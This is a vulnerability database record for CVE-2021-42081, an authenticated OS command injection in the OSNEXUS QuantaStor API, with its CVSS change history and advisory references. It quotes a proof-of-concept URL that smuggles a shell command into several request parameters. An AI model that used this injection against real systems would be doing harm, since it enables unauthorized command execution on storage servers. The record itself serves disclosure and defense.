CVE-2021-42081

An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.

POC: http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al

Configurations

Configuration 1

cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*

History

22 Sep 2025, 07:15

Type Values Removed Values Added
Summary
Removed: (en) An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
Added: (en) An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al

21 Nov 2024, 06:27

Type Values Removed Values Added
CVSS
Removed: v2 : unknown, v3 : 7.2
Added: v2 : unknown, v3 : 9.1
References
  • () https://www.divd.nl/DIVD-2021-00020 -
References
Removed: () https://csirt.divd.nl/CVE-2021-42081 - Third Party Advisory
Added: () https://csirt.divd.nl/CVE-2021-42081 - Third Party Advisory
References
Removed: () https://www.osnexus.com/products/software-defined-storage - Product
Added: () https://www.osnexus.com/products/software-defined-storage - Product
References
Removed: () https://www.wbsec.nl/osnexus - Third Party Advisory
Added: () https://www.wbsec.nl/osnexus - Third Party Advisory

16 Oct 2024, 12:15

Type Values Removed Values Added
References
  • {'url': 'https://www.divd.nl/DIVD-2021-00020', 'tags': ['Broken Link'], 'source': 'csirt@divd.nl'}
  • () https://csirt.divd.nl/DIVD-2021-00020/ -

Information

Published : 2023-07-10 16:15

Updated : 2025-09-22 07:15


NVD link : CVE-2021-42081

Mitre link : CVE-2021-42081

CVE.ORG link : CVE-2021-42081



Products Affected

osnexus

  • quantastor
CWE
CWE-78

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')